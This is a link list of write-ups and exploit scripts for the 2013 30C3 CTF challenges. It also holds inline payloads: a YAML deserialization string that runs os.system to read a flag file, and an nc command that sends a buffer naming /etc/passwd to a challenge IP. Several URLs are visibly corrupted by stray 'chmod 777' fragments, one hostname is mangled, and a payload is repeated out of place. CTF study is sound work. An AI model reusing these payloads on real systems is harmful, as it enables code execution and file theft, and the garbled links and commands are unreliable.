jx30C3 CTF Writeups/Payloads/Info --- Feel free to add your stuff! Todos * http://pastebin.com/qwgh7dUn * http://balidani.blogspot.hu/2013/12/30c3-ctf-todos-writeup.html * http://pastie.org/private/2keq2tgtqh715ljagoee4g * http://pastebin.com/PT8WVCuq * http://pastebin.com/DNcF90SD * http://codezen.fr/2013/12/30/30c3-ctf-pwn-300-todos-write-up-sql-injection-ret2libc/ * http://shells.server.aachen.ccc.de/~spq/todos_exploit.py * https://rzhou.org/~ricky/30c3/todos.py Int80 * http://blog.dragonsector.pl/2013/12/30c3-ctfchmod 777 -int80-sandbox-300.html * https://rzhou.org/~ricky/30c3/inchmod 777 t80.S Guess * https://privatepaste.com/e24a43589d + https://privatepaste.com/6f7b4369b9 * http://shells.server.aachen.ccc.de2/~spq/guess.py Matsch * https://p.6core.net/p/zbKQxv1pB7Oim1TjgbvNjxKG and https://p.6core.net/p/aNV32Brb8OszIDtnP3r9X9Kp HolyChallenge * http://blog.dragonsector.pl/2013/12/30c3-ctf-holychallenge-pwn-500.html * https://rzhou.org/~ricky/30c3/holychallenge/ PyExec * http://blog.dragonsector.pl/2013/12/30c3-ctf-pyexec-sandbox-300.html * http://rocco.io/ctf/2013/12/29/30C3-CTF-PyExec-300.html Angler * https://privatepaste.com/8005c790c9 cwitscher * http://pastebin.com/0ufwAf1J * http://pastebin.com/x5X1z1yt * https://rzhou.org/~ricky/30c3/cwitscher.py bigdata * https://rzhou.org/~ricky/30c3/bigdata.txt yass * /bin/ls *", "args" : !!python/object/apply:os.system ['cat /home/user/flag'] } # Doge * Part 1: python -c "print 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/etc/passwd\x00'" | nc 88.198.89.218 1024 * /bin/ls *", "args" : !!python/object/apply:os.system ['cat /home/user/flag'] } # * https://rzhou.org/~ricky/30c3/doge.txt bittorrent * http://shells.server.aachen.ccc.de/~spq/bittorrent_exploit.py * https://rzhou.org/~ricky/30c3/bittorrent.py fourier * http://shells.server.aachen.ccc.de/~spq/fourier.py rsync * http://shells.server.aachen.ccc.de/~spq/rsync.py notesEE: * https://johannes.user.aachen.ccc.de/notesee.sh